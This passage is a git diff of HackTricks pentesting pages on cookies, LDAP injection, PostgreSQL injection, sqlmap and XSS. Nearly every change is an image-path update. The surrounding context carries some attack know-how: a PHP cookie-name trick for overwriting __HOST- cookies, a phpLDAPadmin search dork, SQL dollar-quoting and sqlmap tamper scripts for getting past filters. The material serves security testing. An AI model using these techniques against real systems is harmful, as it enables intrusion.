+<figure><img src="../../.gitbook/assets/image (6) (1).png" alt=""><figcaption></figcaption></figure>
 
 Or in PHP it was possible to add **other characters at the beginning** of the cookie name that were going to be **replaced by underscore** characters, allowing to overwrite `__HOST-` cookies:
 
-<figure><img src="../../.gitbook/assets/image (7).png" alt="" width="373"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (7) (1).png" alt="" width="373"><figcaption></figcaption></figure>
 
 ## Cookies Attacks
 
diff --git a/pentesting-web/ldap-injection.md b/pentesting-web/ldap-injection.md
index d8bb6c987..1a7d443ec 100644
--- a/pentesting-web/ldap-injection.md
+++ b/pentesting-web/ldap-injection.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -235,7 +235,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
 
 {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
 
-<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md
index 1807f3d1c..e6270f448 100644
--- a/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -106,7 +106,7 @@ SELECT $$hacktricks$$;
 SELECT $TAG$hacktricks$TAG$;
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/pentesting-web/sql-injection/sqlmap/README.md b/pentesting-web/sql-injection/sqlmap/README.md
index 163204362..13e6f56d7 100644
--- a/pentesting-web/sql-injection/sqlmap/README.md
+++ b/pentesting-web/sql-injection/sqlmap/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -236,7 +236,7 @@ Remember that **you can create your own tamper in python** and it's very simple.
 | versionedmorekeywords.py     | Encloses each keyword with versioned MySQL comment                                                                                 |
 | xforwardedfor.py             | Append a fake HTTP header 'X-Forwarded-For'                                                                                        |
 
-<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 1ad72fe44..fd6be1550 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -1,6 +1,6 @@
 # XSS (Cross Site Scripting)
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -1544,7 +1544,7 @@ Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](ht
 * [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
 * [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).